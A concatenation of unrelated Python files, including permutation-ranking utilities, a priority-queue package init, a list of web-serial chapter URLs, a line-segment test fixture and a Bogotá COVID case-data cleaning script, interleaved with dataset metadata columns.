# print("carry value: ", first_carry, final_list)
# print("carried: ", reverse_line_two[1] - first_carry )
# carried = reverse_line_two[1] - first_carry
# second_append = (carried)%line_one[1]
# final_list.append(second_append)
#print(final_list)
return final_list[::-1]
def find_it_2(new_list,index,value):
num = 0
for i in range(len(new_list)):
if new_list[i] == -1:
num+=1
if num == index+1:
new_list[i] = value
#print("new list: ", new_list )
return new_list
# convert an intermediate (rank) number back into a permutation
def order_2(lst):
top = []
limit = len(lst) + 1
for i in range(limit):
top.append(i + 1)
top.pop(0)
new_top = top[::-1]
new_lst = lst
temp = []
for i in range(len(new_lst)+1):
temp.append(-1)
#print("new_lst:", new_lst, "new_top: ", new_top, "temp: ", temp)
for i in range(len(new_lst)):
        #print("new_lst:", new_lst, "new_top: ", new_top, "temp: ", temp)
temp = find_it_2(temp, new_lst[i], new_top[i])
for i in range(len(temp)):
if temp[i] == -1:
temp[i] = 1
#print(temp[::-1])
return temp[::-1]
############### end of increasing-carry order
############### decreasing-carry order (type 3)
# compute the intermediate (rank) number
def shift_3(lst):
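    # Same counting as shift_2, but the digit string is reversed to match the
    # decreasing-carry order.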
new_lst = lst
line_two = []
while new_lst:
count = 0
biggest = max(new_lst)
biggest_index = new_lst.index(biggest)
for i in new_lst[biggest_index+1:]:
if i < biggest:
count += 1
line_two.append(count)
del new_lst[biggest_index]
line_two.pop()
#print("line_two: ", line_two)
#print(line_two[::-1])
return line_two[::-1]
def add_3(lst, k, n):
line_two = shift_3(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
line_one = line_one[::-1]
#print("line_one: ", line_one)
#print("reverse_line_two: ", reverse_line_two)
step_one = reverse_line_two[0] + k
if step_one >= line_one[0]:
first_carry = step_one//line_one[0]
#print("first_carry: ", first_carry)
first_append = step_one%line_one[0]
#print("first_append: ", first_append)
final_list.append(first_append)
if step_one < line_one[0]:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print(reverse_line_two)
while index < (n -1):
#print("current_carry: ", current_carry)
if (reverse_line_two[index]) + current_carry >= line_one[index]:
res = reverse_line_two[index] + current_carry
current_carry = res//line_one[index]
#print("appending: ",res%line_one[index])
final_list.append(res%line_one[index])
index += 1
if (reverse_line_two[index] + current_carry) < line_one[index]:
res1 = reverse_line_two[index] + current_carry
current_carry = 0
#print("appending: ",res1%line_one[index])
final_list.append(res1)
index += 1
#print("final_list: ", final_list)
return final_list[::-1]
def subtract_3(lst, k, n):
line_two = shift_3(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
line_one = line_one[::-1]
step_one = reverse_line_two[0] - k
#print(step_one)
if step_one < 0:
first_carry = -((step_one) // line_one[0])
#print(first_carry)
first_append = step_one%line_one[0]
#print(first_append)
final_list.append(first_append)
if step_one >= 0:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print("final_list: ", final_list)
while index < (n-1):
#print("current_carry: ", current_carry)
#print("index: ", reverse_line_two[index])
#print(reverse_line_two[index] - current_carry)
if reverse_line_two[index] - current_carry < 0:
res = reverse_line_two[index] - current_carry
#print("res: ",res)
final_list.append(res%line_one[index])
current_carry = -(res//line_one[index])
index += 1
if reverse_line_two[index] - current_carry >= 0:
res1 = reverse_line_two[index] - current_carry
current_carry = 0
final_list.append(res1)
index += 1
# print("line_one: ", line_one, "line_two: ", reverse_line_two)
# print("append value: ",(reverse_line_two[0]-k)%line_one[0])
# final_list.append((reverse_line_two[0]-k)%line_one[0])
# print("carry value: ", first_carry, final_list)
# print("carried: ", reverse_line_two[1] - first_carry )
# carried = reverse_line_two[1] - first_carry
# second_append = (carried)%line_one[1]
# final_list.append(second_append)
#print(final_list)
return final_list[::-1]
def find_it_3(new_list,index,value):
num = 0
for i in range(len(new_list)):
if new_list[i] == -1:
num+=1
if num == index+1:
new_list[i] = value
print("new list: ", new_list)
return new_list
# convert an intermediate (rank) number back into a permutation
def order_3(lst):
top = []
limit = len(lst) + 1
for i in range(limit):
top.append(i + 1)
top.pop(0)
new_top = top[::-1]
new_lst = lst[::-1]
#print("top: ",top, "new_lst: ", new_lst)
temp = []
for i in range(len(new_lst)+1):
temp.append(-1)
#print("new_lst:", new_lst, "new_top: ", new_top, "temp: ", temp)
for i in range(len(new_lst)):
        #print("new_lst:", new_lst, "new_top: ", new_top, "temp: ", temp)
temp = find_it_3(temp, new_lst[i], new_top[i])
for i in range(len(temp)):
if temp[i] == -1:
temp[i] = 1
#print(temp[::-1])
return temp[::-1]
############### end of decreasing-carry order
############### adjacent-transposition (SJT) order (type 4)
# def shift_4(lst):
# new_lst = lst
# shifted_num = []
# while new_lst:
# count = 0
# biggest = max(new_lst)
# biggest_index = new_lst.index(biggest)
# for i in range(len(new_lst[biggest_index:])):
# if new_lst[i] < biggest:
# count += 1
# shifted_num.append(count)
# del new_lst[biggest_index]
# shifted_num.pop()
# a = shifted_num[::-1]
# return a
def shift_4(lst):
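    # Intermediate number for the adjacent-transposition (SJT) order: each
    # value's digit counts the smaller elements on the side its current scan
    # direction faces; the direction flips with the parity of earlier digits.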
line_one = []
#print(lst)
reverse_line_two = lst
#print(reverse_line_two)
shifted_num = []
reverse_line_two = reverse_line_two[::-1]
#print(reverse_line_two)
limit = len(reverse_line_two)
#print(limit)
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
left = reverse_line_two[:i]
right = reverse_line_two[i:]
reverse_line_two1 = lst[1:]
#print(len(reverse_line_two1))
#print("line_one: ", line_one, "reverse_line_two: ", reverse_line_two, "reverse_line_two1: ", reverse_line_two1)
    for i in range(len(reverse_line_two1)):
        count = 0
        if i == 0:
            for j in left:
                if line_one[i] > j:
                    count += 1
            shifted_num.append(count)
            # print(shifted_num)
        if i > 0:
            if line_one[i] % 2 == 1:
                if shifted_num[i - 1] % 2 == 0:
                    for j in reverse_line_two[:reverse_line_two.index(line_one[i])]:
                        if line_one[i] > j:
                            count += 1
                    shifted_num.append(count)
                elif shifted_num[i - 1] % 2 == 1:
                    for j in reverse_line_two[reverse_line_two.index(line_one[i]):]:
                        if line_one[i] > j:
                            count += 1
                    shifted_num.append(count)
            elif line_one[i] % 2 == 0:
                if (shifted_num[i - 1] + shifted_num[i - 2]) % 2 == 0:
                    for j in reverse_line_two[:reverse_line_two.index(line_one[i])]:
                        if line_one[i] > j:
                            count += 1
                    shifted_num.append(count)
                if (shifted_num[i - 1] + shifted_num[i - 2]) % 2 == 1:
                    for j in reverse_line_two[reverse_line_two.index(line_one[i]):]:
                        if line_one[i] > j:
                            count += 1
                    shifted_num.append(count)
    # print("shifted_num: ", shifted_num)
    return shifted_num


def add_4(lst, k, n):
    line_two = shift_4(lst)
    # bound
    line_one = []
    # Easier to manipulate in list notation
    reverse_line_two = line_two[::-1]
    # subtracted list i want
    final_list = []
    # length of the bounds
    limit = len(reverse_line_two) + 1
    for i in range(limit):
        line_one.append(i + 1)
    line_one.pop(0)
    line_one = line_one[::-1]
    # print("line_one: ", line_one)
    # print("reverse_line_two: ", reverse_line_two)
    step_one = reverse_line_two[0] + k
    if step_one >= line_one[0]:
        first_carry = step_one // line_one[0]
        # print("first_carry: ", first_carry)
        first_append = step_one % line_one[0]
        # print("first_append: ", first_append)
        final_list.append(first_append)
    if step_one < line_one[0]:
        first_carry = 0
        first_append = step_one % line_one[0]
        final_list.append(first_append)
    index = 1
    current_carry = first_carry
    # print(reverse_line_two)
    while index < (n - 1):
        # print("current_carry: ", current_carry)
        if (reverse_line_two[index]) + current_carry >= line_one[index]:
            res = reverse_line_two[index] + current_carry
            current_carry = res // line_one[index]
            # print("appending: ", res % line_one[index])
            final_list.append(res % line_one[index])
            index += 1
        if (reverse_line_two[index] + current_carry) < line_one[index]:
            res1 = reverse_line_two[index] + current_carry
            current_carry = 0
            # print("appending: ", res1 % line_one[index])
            final_list.append(res1)
            index += 1
    # print("final_list: ", final_list)
    return final_list[::-1]


def subtract_4(lst, k, n):
    line_two = shift_4(lst)
    # bound
    line_one = []
    # Easier to manipulate in list notation
    reverse_line_two = line_two[::-1]
    # subtracted list i want
    final_list = []
    # length of the bounds
    limit = len(reverse_line_two) + 1
    for i in range(limit):
        line_one.append(i + 1)
    line_one.pop(0)
    line_one = line_one[::-1]
    step_one = reverse_line_two[0] - k
    # print(step_one)
    if step_one < 0:
        first_carry = -((step_one) // line_one[0])
        # print(first_carry)
        first_append = step_one % line_one[0]
        # print(first_append)
        final_list.append(first_append)
    if step_one >= 0:
        first_carry = 0
        first_append = step_one % line_one[0]
        final_list.append(first_append)
    index = 1
    current_carry = first_carry
    # print("final_list: ", final_list)
    while index < (n - 1):
        # print("current_carry: ", current_carry)
        # print("index: ", reverse_line_two[index])
        # print(reverse_line_two[index] - current_carry)
        if reverse_line_two[index] - current_carry < 0:
            res = reverse_line_two[index] - current_carry
            # print("res: ", res)
            final_list.append(res % line_one[index])
            current_carry = -(res // line_one[index])
            index += 1
        if reverse_line_two[index] - current_carry >= 0:
            res1 = reverse_line_two[index] - current_carry
            current_carry = 0
            final_list.append(res1)
            index += 1
    return final_list[::-1]


def find_it_4(new_list, index, value):
    num = 0
    for i in range(len(new_list)):
        if new_list[i] == -1:
            num += 1
            if num == index + 1:
                new_list[i] = value
    return new_list


def find_it_neg_4(new_list, index, value):
    num = 0
    lst = new_list[::-1]
    for i in range(len(new_list)):
        if lst[i] == -1:
            num += 1
            if num == index + 1:
                lst[i] = value
    a = lst[::-1]
    return a


def order_4(lst):
    lst1 = lst[::-1]
    limit = len(lst1) + 1
    top = []
    mylist = []
    for i in range(limit):
        top.append(i + 1)
    top.pop(0)
    for i in range(limit):
        mylist.append(-1)
    b = top[::-1]
    # print(b, lst1, mylist)
    for i in range(len(lst1)):
        # print(mylist)
        if b[i] != 2:
            if b[i] % 2 == 1:
                if lst1[i + 1] % 2 == 1:
                    mylist = find_it_4(mylist, lst1[i], b[i])
                    # mylist[lst1[i]] = b[i]
                elif lst1[i + 1] % 2 == 0:
                    mylist = find_it_neg_4(mylist, lst1[i], b[i])
                    # print("find neg: ", mylist, lst1[i], b[i])
            elif b[i] % 2 == 0:
                if (lst1[i + 1] + lst1[i + 2]) % 2 == 1:
                    mylist = find_it_4(mylist, lst1[i], b[i])
                    # mylist[lst1[i]] = b[i]
                elif (lst1[i + 1] + lst1[i + 2]) % 2 == 0:
                    mylist = find_it_neg_4(mylist, lst1[i], b[i])
                    # print("find neg: ", mylist, lst1[i], b[i])
        elif b[i] == 2:
            # print("b: ", b, "i: ", i, "lst1: ", lst1)
            # print(mylist)
            # print("mylist: ", mylist, "lst1[i]: ", lst1[i], "b[i]: ", b[i])
            mylist = find_it_neg_4(mylist, lst1[i], b[i])
    left = []
    no = []
    for i in range(len(mylist)):
        left.append(i + 1)
    for i in left:
        if i not in mylist:
            no.append(i)
    for i in range(len(mylist)):
        if mylist[i] == -1:
            mylist[i] = no[0]
    # print(mylist)
    return mylist


if __name__ == "__main__":
    main()
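# Illustrative sketch (not part of the original file): add_4/subtract_4 above
# propagate carries through a mixed-radix digit list whose per-position bounds
# descend from n to 2, i.e. a factorial-base layout. The same carry rule on a
# least-significant-first digit list, with radix i + 2 at position i
# (hypothetical helper, assumption only):
def add_factorial_base(digits, k):
    carry = k
    out = []
    for i, d in enumerate(digits):
        radix = i + 2              # position i holds values 0 .. i + 1
        total = d + carry
        out.append(total % radix)  # keep the in-range digit
        carry = total // radix     # push the overflow to the next position
    return out

# add_factorial_base([1, 0, 1], 3) == [0, 2, 1]   (7 + 3 == 10 in factorial base)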
| 32.474104
| 116
| 0.563735
| 3,419
| 24,453
| 3.768938
| 0.031881
| 0.073879
| 0.112991
| 0.061928
| 0.880878
| 0.857442
| 0.840369
| 0.821589
| 0.81088
| 0.805293
| 0
| 0.024481
| 0.305075
| 24,453
| 752
| 117
| 32.517287
| 0.733832
| 0.230933
| 0
| 0.790262
| 0
| 0
| 0.001027
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041199
| false
| 0
| 0
| 0
| 0.080524
| 0.003745
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c854f843cb3c80ca6bbdd41ed922815a1c205c0c
| 163
|
py
|
Python
|
data_structures/priority_queues/__init__.py
|
onyonkaclifford/data-structures-and-algorithms
|
e0ca4bfa878273d06bf22c303e47762b8ec3870b
|
[
"MIT"
] | null | null | null |
data_structures/priority_queues/__init__.py
|
onyonkaclifford/data-structures-and-algorithms
|
e0ca4bfa878273d06bf22c303e47762b8ec3870b
|
[
"MIT"
] | null | null | null |
data_structures/priority_queues/__init__.py
|
onyonkaclifford/data-structures-and-algorithms
|
e0ca4bfa878273d06bf22c303e47762b8ec3870b
|
[
"MIT"
] | null | null | null |
from priority_queue import Empty
from sorted_list_priority_queue import SortedListPriorityQueue
from unsorted_list_priority_queue import UnsortedListPriorityQueue
| 40.75
| 66
| 0.92638
| 19
| 163
| 7.578947
| 0.526316
| 0.270833
| 0.395833
| 0.319444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07362
| 163
| 3
| 67
| 54.333333
| 0.953642
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8d023f219b4538f2a6871cdc5ff9c64b52989ea1
| 3,176
|
py
|
Python
|
links.py
|
yakninja/evan-bot
|
8475a79a6369c78478eaca71cdc0e548f5853794
|
[
"BSD-2-Clause"
] | 1
|
2020-11-23T02:54:55.000Z
|
2020-11-23T02:54:55.000Z
|
links.py
|
yakninja/evan-bot
|
8475a79a6369c78478eaca71cdc0e548f5853794
|
[
"BSD-2-Clause"
] | null | null | null |
links.py
|
yakninja/evan-bot
|
8475a79a6369c78478eaca71cdc0e548f5853794
|
[
"BSD-2-Clause"
] | 1
|
2021-11-10T19:52:23.000Z
|
2021-11-10T19:52:23.000Z
|
# -*- coding: utf-8 -*-
LINKS = {
    '1.01': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-01/',
    '1.02': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-02/',
    '1.03': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-03/',
    '1.04': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-04/',
    '1.05': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-05/',
    '1.06': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-06/',
    '1.07': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-07/',
    '1.x (Pages 1)': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-x-pages-1/',
    '2.01': 'https://pactwebserial.wordpress.com/2014/01/18/damages-2-1/',
    '2.02': 'https://pactwebserial.wordpress.com/2014/01/21/damages-2-2/',
    '2.03': 'https://pactwebserial.wordpress.com/2014/01/25/damages-2-3-2/',
    '2.04': 'https://pactwebserial.wordpress.com/2014/01/28/damages-2-4/',
    '2.05': 'https://pactwebserial.wordpress.com/2014/02/01/damages-2-5/',
    '2.06': 'https://pactwebserial.wordpress.com/2014/02/04/damages-2-6/',
    '2.07': 'https://pactwebserial.wordpress.com/category/story/arc-2-damages/2-07/',
    '2.x (Pages 2)': 'https://pactwebserial.wordpress.com/category/story/arc-2-damages/2-x-pages-2/',
    '2.y (Histories)': 'https://pactwebserial.wordpress.com/category/story/arc-2-damages/2-y-histories/',
    '3.01': 'https://pactwebserial.wordpress.com/category/story/arc-3-breach/3-01/',
    '3.02': 'https://pactwebserial.wordpress.com/category/story/arc-3-breach/3-02/',
    '3.03': 'https://pactwebserial.wordpress.com/category/story/arc-3-breach/3-03/',
    '3.04': 'https://pactwebserial.wordpress.com/category/story/arc-3-breach/3-04/',
    '3.05': 'https://pactwebserial.wordpress.com/category/story/arc-3-breach/3-05/',
    '3.x (Histories)': 'https://pactwebserial.wordpress.com/category/story/arc-3-breach/3-x-histories/',
    '4.01': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-01/',
    '4.02': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-02/',
    '4.03': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-03/',
    '4.04': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-04/',
    '4.05': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-05/',
    '4.06': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-06/',
    '4.07': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-07/',
    '4.08': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-08/',
    '4.09': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-09/',
    '4.10': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-10/',
    '4.11': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-11/',
    '4.12': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-12/',
    '4.x (Pages 4)': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-x-pages-4/',
}
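# Illustrative helper (not part of the original module; the function name is
# made up): chapter keys map straight to their URLs.
def chapter_url(key):
    """Return the URL for a chapter key such as '2.03', or None if unknown."""
    return LINKS.get(key)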
| 73.860465
| 105
| 0.691121
| 483
| 3,176
| 4.544513
| 0.086957
| 0.295216
| 0.442825
| 0.492027
| 0.889749
| 0.884282
| 0.785877
| 0.785877
| 0.759453
| 0.759453
| 0
| 0.093878
| 0.074307
| 3,176
| 42
| 106
| 75.619048
| 0.652721
| 0.006612
| 0
| 0
| 0
| 0.815789
| 0.857913
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
23b1482d017bc3838c8671335e3934fa9302e2cd
| 185
|
py
|
Python
|
test/conftest.py
|
yuemingl/ode-python-1
|
a9a12d9d3b7e611874a8d30f6a5c0b83b6087f86
|
[
"MIT"
] | 9
|
2020-05-31T09:22:40.000Z
|
2021-09-15T18:15:15.000Z
|
test/conftest.py
|
yuemingl/ode-python-1
|
a9a12d9d3b7e611874a8d30f6a5c0b83b6087f86
|
[
"MIT"
] | 1
|
2020-11-15T11:38:45.000Z
|
2020-11-15T11:38:45.000Z
|
test/conftest.py
|
yuemingl/ode-python-1
|
a9a12d9d3b7e611874a8d30f6a5c0b83b6087f86
|
[
"MIT"
] | 2
|
2020-11-14T21:47:01.000Z
|
2021-08-03T02:28:10.000Z
|
# -*- coding: utf-8 -*-
from .utils.world import g
from .utils.world import world
from .utils.space import space
from .utils.space import ground
from .utils.space import contactgroup
| 20.555556
| 37
| 0.751351
| 28
| 185
| 4.964286
| 0.392857
| 0.323741
| 0.302158
| 0.431655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006329
| 0.145946
| 185
| 8
| 38
| 23.125
| 0.873418
| 0.113514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
23d5e9aaff62ea005a16a967a858be0ce4c5b5d9
| 1,547
|
py
|
Python
|
tests/data/test_degenerate_zero_length_02.py
|
ideasman42/isect_segments-bentley_ottmann
|
19deb3c5be4c2b91689b87548a875054b43e9952
|
[
"MIT"
] | 80
|
2015-12-04T15:06:49.000Z
|
2022-03-02T18:08:15.000Z
|
test/data/test_degenerate_zero_length_02.py
|
lolistoy/sweepline
|
82a2464f984c119dd438489c5f826e9693a7fabf
|
[
"MIT"
] | 25
|
2015-10-18T13:58:28.000Z
|
2021-06-23T21:54:54.000Z
|
test/data/test_degenerate_zero_length_02.py
|
lolistoy/sweepline
|
82a2464f984c119dd438489c5f826e9693a7fabf
|
[
"MIT"
] | 37
|
2016-07-06T01:38:33.000Z
|
2022-02-19T03:53:14.000Z
|
data = (
((-1.000000, 1.000000), (1.000000, 1.000000)),
((-1.000000, 1.000000), (-1.000000, 1.000000)),
((-1.000000, -1.000000), (-1.000000, 1.000000)),
((1.000000, -1.000000), (-1.000000, -1.000000)),
((1.000000, -1.000000), (1.000000, -1.000000)),
((1.000000, 1.000000), (1.000000, -1.000000)),
((1.000000, 1.000000), (1.000000, 1.000000)),
((-1.000000, -1.000000), (-1.000000, -1.000000)),
((-0.900000, 0.900000), (0.900001, 0.900000)),
((-0.900000, 0.900000), (-0.900000, 0.900000)),
((-0.900000, -0.900000), (-0.900000, 0.900000)),
((0.900001, -0.900000), (-0.900000, -0.900000)),
((0.900001, -0.900000), (0.900001, -0.900000)),
((0.900001, 0.900000), (0.900001, -0.900000)),
((0.900001, 0.900000), (0.900001, 0.900000)),
((-0.900000, -0.900000), (-0.900000, -0.900000)),
((-0.800000, 0.800000), (0.800000, 0.800000)),
((-0.800000, 0.800000), (-0.800000, 0.800000)),
((-0.800000, -0.800000), (-0.800000, 0.800000)),
((0.800000, -0.800000), (-0.800000, -0.800000)),
((0.800000, -0.800000), (0.800000, -0.800000)),
((0.800000, 0.800000), (0.800000, -0.800000)),
((0.800000, 0.800000), (0.800000, 0.800000)),
((-0.800000, -0.800000), (-0.800000, -0.800000)),
((-0.700000, 0.700000), (0.700000, 0.700000)),
((-0.700000, 0.700000), (-0.700000, 0.700000)),
((-0.700000, -0.700000), (-0.700000, 0.700000)),
((0.700000, -0.700000), (-0.700000, -0.700000)),
((0.700000, -0.700000), (0.700000, -0.700000)),
((0.700000, 0.700000), (0.700000, -0.700000)),
((0.700000, 0.700000), (0.700000, 0.700000)),
((-0.700000, -0.700000), (-0.700000, -0.700000)),
)
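# Illustrative check (not part of the original fixture): the degenerate cases
# this data exercises are the zero-length segments, i.e. entries whose two
# endpoints coincide.
zero_length = [seg for seg in data if seg[0] == seg[1]]
assert ((-1.0, 1.0), (-1.0, 1.0)) in zero_length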
| 44.2
| 49
| 0.581771
| 257
| 1,547
| 3.501946
| 0.031128
| 0.248889
| 0.284444
| 0.482222
| 0.995556
| 0.995556
| 0.995556
| 0.995556
| 0.995556
| 0.995556
| 0
| 0.633216
| 0.085326
| 1,547
| 34
| 50
| 45.5
| 0.002827
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
f1d43d49b18f8bca3a508a074de7ff1e1a00d598
| 6,585
|
py
|
Python
|
data/actual_cases.py
|
enflujo/COVID_schools_dashboard
|
702c9c3c91938e514e56f4cf6f325ed954d7bc3e
|
[
"Apache-2.0"
] | null | null | null |
data/actual_cases.py
|
enflujo/COVID_schools_dashboard
|
702c9c3c91938e514e56f4cf6f325ed954d7bc3e
|
[
"Apache-2.0"
] | null | null | null |
data/actual_cases.py
|
enflujo/COVID_schools_dashboard
|
702c9c3c91938e514e56f4cf6f325ed954d7bc3e
|
[
"Apache-2.0"
] | 2
|
2021-09-25T15:37:45.000Z
|
2021-10-01T17:48:28.000Z
|
import datetime
import pandas as pd
import numpy as np


def str_to_datetime(date_str):
    # convert DD/MM/YYYY to type datetime
    format_str = '%d/%m/%Y'  # The format
    datetime_obj = datetime.datetime.strptime(date_str, format_str)
    return datetime_obj.date()


def get_latest_data(filename='/Users/samueltorres/Documents/Projects/Multilayer_COVID19/data/OSB_EnfTransm-COVID-19.csv'):
    cases_data = pd.read_csv(filename, encoding='unicode_escape', delimiter=';')
    df_cases_data = pd.DataFrame(columns=['reported_date', 'type'])
    reported_dates = cases_data['FECHA_DIAGNOSTICO']
    reported_dates_conv = []
    for data_date in reported_dates:
        if isinstance(data_date, str):
            date_converted = str_to_datetime(data_date)
        else:
            # placeholder for unparseable rows; the original datetime.date(0000, 0, 0)
            # raises ValueError (year, month and day must all be >= 1)
            date_converted = datetime.date(1, 1, 1)
        reported_dates_conv.append(date_converted)
    df_cases_data['reported_date'] = reported_dates_conv
    df_cases_data['type'] = cases_data['ESTADO']
    df_latest_cases = pd.DataFrame(columns=['reported_date', 'type'])
    consider_from = datetime.date(2021, 1, 1)
    latest_dates_l = []
    latest_cases_l = []
    for idx, data_ in df_cases_data.iterrows():
        if data_['reported_date'] < consider_from:
            continue
        else:
            latest_dates_l.append(data_['reported_date'])
            latest_cases_l.append(data_['type'])
    df_latest_cases['reported_date'] = latest_dates_l
    df_latest_cases['type'] = latest_cases_l
    return df_latest_cases


def get_complete_data(filename='/Users/samueltorres/Documents/Projects/Multilayer_COVID19/data/OSB_EnfTransm-COVID-19.csv'):
    # read data
    cases_data = pd.read_csv(filename, encoding='unicode_escape', delimiter=';')
    # create DataFrame
    df_clean_data = pd.DataFrame(columns=['reported_date', 'type'])
    # extract dates
    reported_dates = cases_data['FECHA_DIAGNOSTICO']
    reported_dates_conv = []
    for data_date in reported_dates:
        if isinstance(data_date, str):
            date_converted = str_to_datetime(data_date)
        else:
            date_converted = datetime.date(1, 1, 1)  # see note above on date(0000, 0, 0)
        reported_dates_conv.append(date_converted)
    # extract states
    reported_types = cases_data['ESTADO']
    reported_type_conv = []
    for data_type in reported_types:
        if data_type == 'Leve':
            reported_type_conv.append(2)
        elif data_type == 'Moderado':
            reported_type_conv.append(3)
        elif data_type == 'Grave':
            reported_type_conv.append(4)
        elif data_type == 'Fallecido':
            reported_type_conv.append(5)
        elif data_type == 'Recuperado':
            reported_type_conv.append(6)
        elif data_type == 'Fallecido (No aplica No causa Directa)':
            reported_type_conv.append(98)
        else:
            reported_type_conv.append(99)
    # save cleaned data
    df_clean_data['reported_date'] = reported_dates_conv
    df_clean_data['type'] = reported_type_conv
    # sort dates
    df_clean_data = df_clean_data.sort_values(by='reported_date')
    # create states DataFrame
    df_states_list = []
    start_date = min(df_clean_data['reported_date'])
    end_date = max(df_clean_data['reported_date'])
    delta_d = datetime.timedelta(days=1)
    # iterate over days
    while start_date <= end_date:
        actual_date = start_date
        data_i_mask = df_clean_data['reported_date'] == actual_date
        data_i = pd.DataFrame(df_clean_data[data_i_mask])
        df_states_data = pd.DataFrame(columns=['reported_date', 'I1', 'I2', 'I3', 'D', 'R'])
        df_states_data['reported_date'] = actual_date
        df_states_data['I1'] = sum(data_i['type'] == 2)
        df_states_data['I2'] = sum(data_i['type'] == 3)
        df_states_data['I3'] = sum(data_i['type'] == 4)
        df_states_data['D'] = sum(data_i['type'] == 5)
        df_states_data['R'] = sum(data_i['type'] == 6)
        df_states_list.append(df_states_data)
        # advance at the end of the iteration; the original incremented at the
        # top of the loop, which skipped the first day (cf. the script below)
        start_date += delta_d
    df_return = pd.concat(df_states_list)
    return df_return


data = get_latest_data()
data.to_csv('data/LatestCases_Bogota.csv', index=False)

filename = '/Users/samueltorres/Documents/Projects/Multilayer_COVID19/data/OSB_EnfTransm-COVID-19.csv'
cases_data = pd.read_csv(filename, encoding='unicode_escape', delimiter=';')
# create DataFrame
df_clean_data = pd.DataFrame(columns=['reported_date', 'type'])
# extract dates
reported_dates = cases_data['FECHA_DIAGNOSTICO']
reported_dates_conv = []
for data_date in reported_dates:
    if isinstance(data_date, str):
        date_converted = str_to_datetime(data_date)
    else:
        date_converted = datetime.date(1, 1, 1)  # see note above on date(0000, 0, 0)
    reported_dates_conv.append(date_converted)
# extract states
reported_types = cases_data['ESTADO']
reported_type_conv = []
for data_type in reported_types:
    if data_type == 'Leve':
        reported_type_conv.append(2)
    elif data_type == 'Moderado':
        reported_type_conv.append(3)
    elif data_type == 'Grave':
        reported_type_conv.append(4)
    elif data_type == 'Fallecido':
        reported_type_conv.append(5)
    elif data_type == 'Recuperado':
        reported_type_conv.append(6)
    elif data_type == 'Fallecido (No aplica No causa Directa)':
        reported_type_conv.append(98)
    else:
        reported_type_conv.append(99)
# save cleaned data
df_clean_data['reported_date'] = reported_dates_conv
df_clean_data['type'] = reported_type_conv
# sort dates
df_clean_data = df_clean_data.sort_values(by='reported_date')
# create states DataFrame
df_states_list = []
